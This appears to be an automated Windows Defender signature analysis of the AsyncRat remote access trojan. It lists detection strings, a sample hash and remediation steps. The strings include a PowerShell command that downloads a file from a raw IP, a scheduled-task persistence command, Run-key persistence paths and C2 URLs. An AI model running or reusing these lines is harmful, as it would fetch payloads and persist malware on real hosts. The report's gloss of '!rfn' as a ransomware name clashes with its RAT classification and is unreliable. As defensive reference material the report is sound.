Backdoor:MSIL/AsyncRat!rfn - Windows Defender threat signature analysis
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:MSIL/AsyncRat!rfn
Classification:
Type: Backdoor
Platform: MSIL
Family: AsyncRat
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !rfn (specific ransomware family name)
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Backdoor - Provides unauthorized remote access for .NET (Microsoft Intermediate Language) platform, family AsyncRat

Summary:

This is a concrete detection of Backdoor:MSIL/AsyncRat!rfn, a Remote Access Trojan (RAT) that gives an attacker full control of the infected system. It uses legitimate Windows components such as MSBuild.exe and COM Surrogate for execution and evasion, establishes persistence through registry Run keys, and communicates with command-and-control servers for data exfiltration and further malicious activity.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat:
Filename: 41b2688b753738f8fe179c6517535fece2e4d22ddf52b.exe
SHA-256: 41b2688b753738f8fe179c6517535fece2e4d22ddf52b6449635413056854cb6
Date: 17/11/2025
Remediation Steps:
Immediately isolate the affected host from the network. Conduct a thorough forensic analysis and full system scan with up-to-date security software. Remove all detected malicious files and registry entries. Verify and remove any established persistence mechanisms (e.g., Run keys). Reset all potentially compromised user credentials and consider a complete system reimage for critical assets due to the extensive capabilities of RATs.
=== END REPORT ===
This analysis was last updated on 17/11/2025.